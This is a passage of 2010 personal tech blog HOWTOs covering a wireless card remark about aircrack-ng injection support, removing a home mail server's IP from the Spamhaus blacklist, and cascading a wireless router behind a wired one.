Then click the "Refresh" button. Now, you should see the Access Points in the air. Select your desired Access Point, entered password and surf the internet.

Remarks :

RTL8191SE wireless card does not support aircrack-ng's injection mode. You may consider to buy USB wireless adapter, such as TP-Link TL-WN321G, TP-Link TL-WN821N and TL-WN822N. Or, changes the RTL8192SE to Intel 5100 as they all support monitor and injection modes.

That's all! See you.

HOWTO : Remove your IP address from the SPAM blacklist

2010-11-20T19:03:00.001+08:00

If you are setting up a mail server at home, you will wonder why the recipient cannot receive your email which is sent by your mail server. The reason is that your IP is blacklisted.

How to overcome this problem? It is quiet easy and just send a request to the Spamhaus.org to cancel your IP from the blacklist. For example, your IP is 218.191.114.234.

http://spamhaus.org/query/bl?ip=218.191.114.234

If you find any item is in red colour (e.g. PBL), your IP is blacklisted. You just click on the link under the red coloured item. Then, select "Remove an IP from PBL" button. Usually, SBL and XBL are in green colour.

Accepted the agreement and click "Remove IP address" button. Finally, fill in the blanks and wait for the confirmation email for the confirmation code to fill into the screen provided after you sent the request.

Make sure your email address is not a web based free account, such as gmail, hotmail, or yahoo and etc.

That's all! See you.

HOWTO : Wireless Router connects to Wired Router

2010-11-20T12:43:00.002+08:00

*** This tutorial is written on July 16, 2007 by me. I repost it here for reference. The origianl tutorial is here. ***

I have a wired and a wireless routers. I connect them together to make them looking as one router. Then, I can access all the computers within the same intranet.

Router A (connect to the internet)

Step 1 :

I assigned the wired router to be router A which is connected to the internet directly. I did nothing on the Router A. The LAN IP is 192.168.0.1.

Router B (connect to the Router A)

Step 2 :

I assigned the wireless router to be Router B and I should change the settings of it.

WAN -
Set the WAN IP to be static 192.168.111.2, subnet mask is 255.255.255.0 and gateway is 192.168.111.1, no matter your Router B is wired or wireless. For me, Router B is a wireless. (You can change the WAN IP and gateway to meet your requirement, here is only an example)

LAN :
Disabled DHCP and set the LAN IP to 192.168.0.200, subnet mask is 255.255.255.0, no matter your Router B is wired or wireless. (You can change the LAN IP to meet your requirement, here is only an example)

Step 3 :

Connect Router A and Router B via a cable on LAN ports only. WAN port will not be used at the Router B. Connect Router A to the internet as normal. Now, you can access Router A by 192.168.0.1 and Router B by 192.168.0.200 via your browser. Any computer or laptop will be assigned an IP of 192.168.0.XXX.

That’s all! See you.